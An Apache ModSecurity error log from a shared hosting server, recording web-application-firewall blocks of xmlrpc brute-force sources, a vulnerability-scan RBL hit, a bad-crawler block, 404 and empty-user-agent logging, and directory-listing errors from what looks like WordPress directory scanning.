[Tue May 26 17:13:52.754433 2026] [security2:error] [pid 860158:tid 860320] [client 203.194.101.7:50366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHeIYFlz_JJsUnscK-0QAAAKU"]
[Tue May 26 17:13:52.754545 2026] [security2:error] [pid 860158:tid 860320] [client 203.194.101.7:50366] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHeIYFlz_JJsUnscK-0QAAAKU"]
[Tue May 26 17:13:52.914256 2026] [security2:error] [pid 860158:tid 860299] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHeIYFlz_JJsUnscK-1QAAAJA"]
[Tue May 26 17:13:53.156270 2026] [autoindex:error] [pid 860158:tid 860374] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:53.578546 2026] [security2:error] [pid 860158:tid 860402] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHeYYFlz_JJsUnscK-8gAAAPc"]
[Tue May 26 17:13:53.754861 2026] [security2:error] [pid 860158:tid 860390] [client 20.9.81.163:48714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahWHeYYFlz_JJsUnscK--QAAAOs"]
[Tue May 26 17:13:53.782786 2026] [autoindex:error] [pid 860158:tid 860404] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:53.916477 2026] [security2:error] [pid 860158:tid 860366] [client 20.9.81.163:48714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahWHeYYFlz_JJsUnscK_AwAAANM"]
[Tue May 26 17:13:53.964668 2026] [autoindex:error] [pid 860158:tid 860305] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/themes/twentytwentythree/patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:54.018121 2026] [security2:error] [pid 860158:tid 860290] [client 20.9.81.163:48714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahWHeoYFlz_JJsUnscK_CgAAAIc"]
[Tue May 26 17:13:54.120048 2026] [security2:error] [pid 860158:tid 860363] [client 20.9.81.163:48714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahWHeoYFlz_JJsUnscK_EQAAANA"]
[Tue May 26 17:13:54.194280 2026] [autoindex:error] [pid 860158:tid 860365] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:54.222659 2026] [security2:error] [pid 860158:tid 860311] [client 20.9.81.163:48714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahWHeoYFlz_JJsUnscK_GQAAAJw"]
[Tue May 26 17:13:54.325314 2026] [security2:error] [pid 860158:tid 860410] [client 20.9.81.163:48714] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.toronto121mortgage.com"] [uri "/index.php"] [unique_id "ahWHeoYFlz_JJsUnscK_GgAAAP8"]
[Tue May 26 17:13:54.455636 2026] [autoindex:error] [pid 860158:tid 860337] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:54.652896 2026] [autoindex:error] [pid 860158:tid 860409] [client 45.86.200.42:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:54.931194 2026] [security2:error] [pid 860158:tid 860291] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHeoYFlz_JJsUnscK_OAAAAIg"]
[Tue May 26 17:13:55.208006 2026] [security2:error] [pid 860158:tid 860406] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHe4YFlz_JJsUnscK_RAAAAPs"]
[Tue May 26 17:13:55.298127 2026] [security2:error] [pid 860158:tid 860338] [client 84.37.241.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWHeoYFlz_JJsUnscK_LAAAALc"]
[Tue May 26 17:13:55.331213 2026] [security2:error] [pid 860158:tid 860358] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHeoYFlz_JJsUnscK_OwAAAMs"]
[Tue May 26 17:13:55.479524 2026] [autoindex:error] [pid 860158:tid 860319] [client 45.86.200.42:59463] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:55.793439 2026] [security2:error] [pid 860158:tid 860372] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHe4YFlz_JJsUnscK_YgAAANk"]
[Tue May 26 17:13:56.085213 2026] [security2:error] [pid 860158:tid 860376] [client 45.86.200.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHfIYFlz_JJsUnscK_ZgAAAN0"]
[Tue May 26 17:13:56.409509 2026] [autoindex:error] [pid 860158:tid 860308] [client 152.58.34.182:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:13:56.798114 2026] [security2:error] [pid 860158:tid 860404] [client 152.58.34.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWHfIYFlz_JJsUnscK_oQAAAPk"], referer: https://www.ucdc.co.in/
[Tue May 26 17:13:57.324190 2026] [autoindex:error] [pid 860158:tid 860405] [client 152.58.34.182:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:13:57.407995 2026] [security2:error] [pid 860158:tid 860312] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHfIYFlz_JJsUnscK_pQAAAJ0"]
[Tue May 26 17:13:58.387962 2026] [autoindex:error] [pid 860158:tid 860380] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:58.477330 2026] [security2:error] [pid 860158:tid 860406] [client 168.196.238.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHfoYFlz_JJsUnscK_0gAAAPs"], referer: https://www.anujtradingco.com/
[Tue May 26 17:13:58.582249 2026] [autoindex:error] [pid 860158:tid 860341] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:13:58.638045 2026] [security2:error] [pid 860158:tid 860161] [remote 74.7.241.58:38826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWHfoYFlz_JJsUnscK_2QAA7wI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:13:59.063891 2026] [security2:error] [pid 860158:tid 860325] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHfoYFlz_JJsUnscK_5gAAAKo"]
[Tue May 26 17:13:59.280186 2026] [security2:error] [pid 860158:tid 860372] [client 168.196.238.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHf4YFlz_JJsUnscK_9gAAANk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1451658&moderation-hash=e1d6a6b8e4284daf45d45ed63eb70ee7
[Tue May 26 17:13:59.555250 2026] [security2:error] [pid 860158:tid 860411] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHf4YFlz_JJsUnscK_7AAAAQA"]
[Tue May 26 17:13:59.874025 2026] [security2:error] [pid 860158:tid 860336] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHf4YFlz_JJsUnscLACQAAALU"]
[Tue May 26 17:14:00.274021 2026] [security2:error] [pid 860158:tid 860369] [client 103.174.5.177:54690] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHgIYFlz_JJsUnscLADgAAANY"]
[Tue May 26 17:14:00.274150 2026] [security2:error] [pid 860158:tid 860369] [client 103.174.5.177:54690] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHgIYFlz_JJsUnscLADgAAANY"]
[Tue May 26 17:14:00.278397 2026] [security2:error] [pid 860158:tid 860373] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHgIYFlz_JJsUnscLAEwAAANo"]
[Tue May 26 17:14:00.538832 2026] [autoindex:error] [pid 860158:tid 860413] [client 45.86.200.31:39743] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:00.772433 2026] [security2:error] [pid 860158:tid 860311] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHgIYFlz_JJsUnscLAKQAAAJw"]
[Tue May 26 17:14:01.010475 2026] [autoindex:error] [pid 860158:tid 860376] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:01.245631 2026] [security2:error] [pid 860158:tid 860399] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHgYYFlz_JJsUnscLAOAAAAPQ"]
[Tue May 26 17:14:01.617239 2026] [security2:error] [pid 860158:tid 860334] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHgYYFlz_JJsUnscLASwAAALM"]
[Tue May 26 17:14:01.787150 2026] [security2:error] [pid 860158:tid 860337] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHgYYFlz_JJsUnscLAPwAAALY"]
[Tue May 26 17:14:02.171820 2026] [autoindex:error] [pid 860158:tid 860377] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:02.419851 2026] [security2:error] [pid 860158:tid 860415] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHgoYFlz_JJsUnscLAaQAAAQQ"]
[Tue May 26 17:14:02.699115 2026] [security2:error] [pid 860158:tid 860407] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHgoYFlz_JJsUnscLAcgAAAPw"]
[Tue May 26 17:14:03.035722 2026] [autoindex:error] [pid 860158:tid 860387] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/css/dist/edit-widgets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:03.164356 2026] [security2:error] [pid 860158:tid 860327] [client 203.194.101.7:50733] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHg4YFlz_JJsUnscLAhgAAAKw"]
[Tue May 26 17:14:03.164504 2026] [security2:error] [pid 860158:tid 860327] [client 203.194.101.7:50733] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHg4YFlz_JJsUnscLAhgAAAKw"]
[Tue May 26 17:14:03.241529 2026] [autoindex:error] [pid 860158:tid 860300] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/Requests/src/Exception/Http/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:03.431610 2026] [autoindex:error] [pid 860158:tid 860383] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:03.631456 2026] [autoindex:error] [pid 860158:tid 860404] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:03.835230 2026] [autoindex:error] [pid 860158:tid 860296] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:03.835425 2026] [security2:error] [pid 860158:tid 860363] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHg4YFlz_JJsUnscLAlAAAANA"]
[Tue May 26 17:14:04.281107 2026] [autoindex:error] [pid 860158:tid 860370] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-content/themes/twentytwentytwo/assets/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:14:04.766440 2026] [security2:error] [pid 860158:tid 860410] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHhIYFlz_JJsUnscLAuQAAAP8"]
[Tue May 26 17:14:04.996703 2026] [security2:error] [pid 860158:tid 860336] [client 45.86.200.31:39743] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHhIYFlz_JJsUnscLAvQAAALU"]
[Tue May 26 17:14:05.353420 2026] [security2:error] [pid 860158:tid 860318] [client 185.191.171.12:15558] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-17th/list/"] [unique_id "ahWHhYYFlz_JJsUnscLAygAAAKM"]
[Tue May 26 17:14:05.353580 2026] [security2:error] [pid 860158:tid 860318] [client 185.191.171.12:15558] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/january-17th/list/"] [unique_id "ahWHhYYFlz_JJsUnscLAygAAAKM"]
[Tue May 26 17:14:05.386859 2026] [security2:error] [pid 860158:tid 860386] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHhYYFlz_JJsUnscLAyQAAAOc"]
[Tue May 26 17:14:06.034750 2026] [security2:error] [pid 860158:tid 860385] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHhYYFlz_JJsUnscLA0AAAAOY"]
[Tue May 26 17:14:06.189228 2026] [security2:error] [pid 860158:tid 860306] [client 45.86.200.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "soto-plumbing.com"] [uri "/index.php"] [unique_id "ahWHhoYFlz_JJsUnscLA3gAAAJc"]
[Tue May 26 17:14:06.588175 2026] [autoindex:error] [pid 860158:tid 860376] [client 45.86.200.31:0] AH01276: Cannot serve directory /home1/sotopzya/public_html/wp-includes/html-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
